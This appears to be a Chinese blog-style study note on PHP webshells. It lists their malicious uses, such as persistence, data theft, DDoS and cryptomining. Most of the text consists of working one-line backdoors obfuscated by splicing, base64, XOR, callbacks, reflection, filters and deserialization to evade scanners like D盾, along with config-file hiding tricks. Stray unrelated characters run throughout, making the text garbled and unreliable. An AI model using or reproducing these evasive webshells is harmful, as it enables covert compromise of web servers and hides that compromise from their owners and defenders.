初識Webshell:
上傳Webshell的目的:
1.權(quán)限維持九妈,方便下次連接控制系統(tǒng)
2.權(quán)限提升乳丰,利用某些漏洞將權(quán)限提升至管理員權(quán)限
3.做跳板機(jī)--探測,攻擊內(nèi)網(wǎng)其他服務(wù)器
4.備份下載數(shù)據(jù)庫文件或者其他重要文件
5.DDoS攻擊--黑灰產(chǎn)DDoS攻擊需求高
6.挖礦--例如利用JS挖掘門羅幣
7.黑帽SEO ,流量劫持;提升在搜索引擎的排名
8.網(wǎng)頁掛馬--攻擊訪問者
9.充當(dāng)代理服務(wù)器
上傳WebShell的利用途徑:
- 登陸管理后臺
- 文件上傳
- 代碼執(zhí)行&命令執(zhí)行
- Web服務(wù)器文件解析漏洞
- SQL注入
- 文件包含
- 未授權(quán)訪問
- 弱口令&暴力破解
WebShell變形技術(shù)——繞過檢測:
- 關(guān)鍵字混淆
- 外調(diào)惡意代碼
- 配置文件隱藏
- 文件包含
- 正則函數(shù)
- 回調(diào)函數(shù)
- 注釋類后們
- 反射函數(shù)
- 過濾器函數(shù)后門
- 反序列化
最簡單明了的webshell:
# shell.php
<?php @eval($_POST['cmd']);?>
關(guān)鍵字混淆——拼接:
拼接:將一些關(guān)鍵函數(shù)拆分寡键,然后拼接媳溺,使得WebShlel檢測系統(tǒng)無法匹配到關(guān)鍵字
# shell2.php
<?php
$a='a';
$b='ert';
$c=$a.'ss'.$b; //assert
$c($_GET['cmd']);
?>
# shell3.php
<?php
@$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r';
@$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t';
@$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'}
[/*-/*-*/123/*-/*-*/]);
?>
# shell4.php
<?php
$a='chr';
$b=$a(97).$a(115).$a(115).$a(101).$a(114).$a(116); //assert
$b($_POST['test']);
?>
關(guān)鍵字混淆——加解密:
加解密:將關(guān)鍵代碼加密后解密月幌,能逃避一些沒解密還原或還原程度不夠的WebShell檢測系統(tǒng)
# shell5.php
<?php
$a=base64_decode('YXNzZXJ0');//assert
$b=base64_decode('X0dFVA==');//_GET
$a(${$b}['test']);
?>
關(guān)鍵字混淆——異或類生成新字符:
異或類生成新字符:生成新字符,逃避檢測系統(tǒng)對關(guān)鍵字的檢測
# shell6.php
<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"<0x06>").($_[+""]|"D").($_[+""]^"<0x15>"); //GET
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
# shell7.php
<?php
@$_++; // $_ = 1
$__=("#"^"|"); // $__ = POST
$__.=("."^"~");
$__.=("/"^"`");
$__.=("|"^"/");
$__.=("{"^"/");
@eval(${$__}[!$_]); //PASS:0
?>
php我沒系統(tǒng)學(xué)過悬蔽,這里沒看懂扯躺,以后有機(jī)會學(xué)php的話再來解釋,先記錄下來蝎困。
2021/3/18-補(bǔ)充:
#!/usr/bin/python
# -*- coding: utf-8 -*-
a= '#./|{'
b= '|~`//'
result_list = []
count = 0
if len(a)>len(b):
for line in b:
c=ord(a[count])
d=ord(line)
result = chr(c^d)
print(result)
result_list.append(result)
count += 1
else:
for line in a:
c=ord(b[count])
d=ord(line)
result = chr(c^d)
print(result)
result_list.append(result)
count += 1
decode_result = ''
for key in result_list:
decode_result += key
print(decode_result)
#!/usr/bin/python
# -*- coding: utf-8 -*-
a= '`~·!@#$%^&*()_+{}[];\':|\"\\,./<>?/*-123456789asdfghjklqwertyuiopzxcvbnmASDFGHJKLQWERTYUIOPZXCVBNM'
b= '`~·!@#$%^&*()_+{}[];\':|\"\\,./<>?/*-123456789asdfghjklqwertyuiopzxcvbnmASDFGHJKLQWERTYUIOPZXCVBNM'
result_list = []
count = 0
for a_line in a:
for b_line in b:
if chr(ord(a_line)^ord(b_line))=='e':
print("e: " + a_line + '\t' + b_line)
elif chr(ord(a_line)^ord(b_line))=='v':
print("v: " + a_line + '\t' + b_line)
elif chr(ord(a_line)^ord(b_line))=='a':
print("a: " + a_line + '\t' + b_line)
elif chr(ord(a_line)^ord(b_line))=='l':
print("l: " + a_line + '\t' + b_line)
D盾查殺測試:
2.外調(diào)惡意代碼:
將真正的惡意代碼隱藏在本地的一些圖片录语,附件類文件里,或者使用遠(yuǎn)程下載的方式來逃避WebShell檢測系統(tǒng)的識別
涉及的一些函數(shù):file_get_contents禾乘,curl澎埠,include,require盖袭,file等
# test.php
<?php
$a = $_GET['file'];
@include($a);
?>
上傳圖片馬(做好隱藏)失暂,然后通過include包含解析
如果想將惡意代碼隱藏在其他服務(wù)器彼宠,我們使用HTTP,F(xiàn)TP去下載弟塞,不過前提是在php的配置文件php.ini中滿足以下:
allow_url_fopen = On
allow_url_include = On
3.配置文件隱藏:
我們可以隱藏的配置文件如php.ini, .user.ini凭峡,.htaccess,下面以php.ini為例,在其配置文件中:
auto_prepend_file=“/file.php/” 相當(dāng)于在php腳本頭部include
auto_append_file=“/file.php/” 相當(dāng)于在php腳本底部include
注:auto_prepend_file 與 auto_append_file 只能require一個php文件决记,但這個php文件內(nèi)可以require多個其他的php文件摧冀。
4.文件包含:
通過包含文件來執(zhí)行后門,這里介紹通過php流來達(dá)到后門文件的效果系宫。
文件包含函數(shù):Include,include_once,requiue ,require_once
這里利用之前提到的一個后門文件:
# test2.php
<?php @include($_GET['file']);?>
這里復(fù)現(xiàn)失敗了索昂,應(yīng)該是環(huán)境原因,先放著扩借。
正則函數(shù):
使用正則函數(shù)preg_replace當(dāng)作后門椒惨,能有效的混淆Web管理員和一些檢測系統(tǒng)的查殺
# test3.php
<?php
$a=preg_replace("/d/","ss","adert");
$b=$_GET['cmd'];
$a($b)
?>
回調(diào)函數(shù):
回調(diào)函數(shù)類后門是一個比較隱藏的后門類型,正是由于其不多見潮罪,一些WebShell的檢測系統(tǒng)不會很嚴(yán)格的去檢測這些函數(shù)康谆。
可以做回調(diào)后門的一些函數(shù):
call_user_func,call_user_func_array嫉到,array_filter沃暗,array_map,array_reduce何恶,array_udiff孽锥,array_walk,array_walk_recursive
# test4.php
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, base64_decode($e));
?>
原理:array_filter() 函數(shù)把輸入數(shù)組中的每個鍵值傳給回調(diào)函數(shù)细层。如果回調(diào)函數(shù)返回 true惜辑,則把輸入數(shù)組中的當(dāng)前鍵值返回給結(jié)果數(shù)組
"YXNzZXJ0"經(jīng)過base64解碼后為"assert",回調(diào)函數(shù)為assert疫赎,參數(shù)pass傳輸?shù)臄?shù)據(jù)會直接傳給assert函數(shù)執(zhí)行韵丑。
詳情請參考:php回調(diào)后門,php過WAF一句話,php最新一句話,php過狗一句話
注釋類后門:
一些WebShell的檢測可能會忽略注釋,而我們正好可以利用這一點(diǎn)
# test5.php
<?php
/**
* eval($_GET[m]);
*/
class Test { }
$rc = new ReflectionClass('Test'); //建立反射類的一個對象
$comment = $rc->getDocComment(); //執(zhí)行反射類的一個成員函數(shù)虚缎,獲取完整的注釋撵彻。
$pos1 = strpos($comment,'eval'); //標(biāo)記eval開始的位置
$pos2 = strpos($comment,';'); //標(biāo)記結(jié)束的位置
$len = $pos2 - $pos1 + 1; //獲取語句長度
$cmd = substr($comment,$pos1,$len); //按長度截取字符串
eval($cmd);
?>
有點(diǎn)問題
反射函數(shù):
通過反射函數(shù)構(gòu)造WebShell
# test6.php
<?php
$func = new ReflectionFunction("system");
echo $func->invokeArgs(array("$_GET[c]"));
?>
過濾器后門:
FILTER_CALLBACK 過濾器隱藏我們的后門文件
# test7.php
<?php
filter_var($_REQUEST['op'],FILTER_CALLBACK,array('options' => 'assert'));
?>
反序列化后門:
通過php的序列化和反序列化,我們也能制作一個WebShell后門
# test8.php
<?php
class A{
var $test = 'demo';
function __destruct(){
@eval($this->test);
}
}
$test = $_POST['test'];
$len = strlen($test)+1;
$pp = "0:1:\"A\":1:{s:4:\"test\";s:".$len.":\"".$test.";\";}";
$test_unser = unserialize($pp);
有點(diǎn)問題
D盾查殺檢測:
總結(jié)一下实牡,不懂php感覺沒啥收獲陌僵,有點(diǎn)后悔記錄這篇文章了。创坞。碗短。